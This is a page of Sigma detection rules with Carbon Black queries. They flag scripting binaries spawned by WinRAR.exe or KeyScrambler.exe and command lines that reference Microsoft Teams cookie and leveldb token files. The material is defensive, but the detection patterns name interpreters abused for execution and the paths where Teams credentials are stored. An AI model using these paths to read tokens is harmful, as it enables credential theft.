ParentImage:\\WinRAR.exe ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe) OR (OriginalFileName:Cmd.Exe OR OriginalFileName:cscript.exe OR OriginalFileName:mshta.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll OR OriginalFileName:regsvr32.exe OR OriginalFileName:RUNDLL32.EXE OR OriginalFileName:wscript.exe))

view Sigma YAML

title: Potentially Suspicious Child Process Of WinRAR.EXE
id: 146aace8-9bd6-42ba-be7a-0070d8027b76
related:
    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
      type: similar
status: test
description: Detects potentially suspicious child processes of WinRAR.exe.
references:
    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-31
tags:
    - attack.execution
    - attack.t1203
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\WinRAR.exe'
    selection_binaries:
        # Note: add additional binaries that the attacker might use
        - Image|endswith:
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'cscript.exe'
              - 'mshta.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
              - 'regsvr32.exe'
              - 'RUNDLL32.EXE'
              - 'wscript.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potentially Suspicious Child Process of KeyScrambler.exe

Detects potentially suspicious child processes of KeyScrambler.exe

status test author Swachchhanda Shrawan Poudel ATT&CK sub-technique id ca5583e9-8f80-46ac-ab91-7f314d13b984

carbon_black query

ParentImage:\\KeyScrambler.exe ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe) OR (OriginalFileName:Cmd.Exe OR OriginalFileName:cscript.exe OR OriginalFileName:mshta.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll OR OriginalFileName:regsvr32.exe OR OriginalFileName:RUNDLL32.EXE OR OriginalFileName:wscript.exe))

view Sigma YAML

title: Potentially Suspicious Child Process of KeyScrambler.exe
id: ca5583e9-8f80-46ac-ab91-7f314d13b984
related:
    - id: d2451be2-b582-4e15-8701-4196ac180260
      type: similar
status: test
description: Detects potentially suspicious child processes of KeyScrambler.exe
references:
    - https://twitter.com/DTCERT/status/1712785421845790799
author: Swachchhanda Shrawan Poudel
date: 2024-05-13
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1203
    - attack.t1574.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\KeyScrambler.exe'
    selection_binaries:
        # Note: add additional binaries that the attacker might use
        - Image|endswith:
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'cscript.exe'
              - 'mshta.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
              - 'regsvr32.exe'
              - 'RUNDLL32.EXE'
              - 'wscript.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potentially Suspicious Command Targeting Teams Sensitive Files

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.

status test author @SerkinValery ATT&CK technique id d2eb17db-1d39-41dc-b57f-301f6512fa75

carbon_black query

(CommandLine:\\Microsoft\\Teams\\Cookies* OR CommandLine:\\Microsoft\\Teams\\Local\ Storage\\leveldb*) (-Image:\\Microsoft\\Teams\\current\\Teams.exe)

view Sigma YAML

title: Potentially Suspicious Command Targeting Teams Sensitive Files
id: d2eb17db-1d39-41dc-b57f-301f6512fa75
status: test
description: |
    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
    The database might contain authentication tokens and other sensitive information about the logged in accounts.
references:
    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
author: '@SerkinValery'
date: 2022-09-16
modified: 2023-12-18
tags:
    - attack.credential-access
    - attack.t1528
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '\Microsoft\Teams\Cookies'
            - '\Microsoft\Teams\Local Storage\leveldb'
    filter_main_legit_locations:
        Image|endswith: '\Microsoft\Teams\current\Teams.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

VMware Carbon Black

Detection rules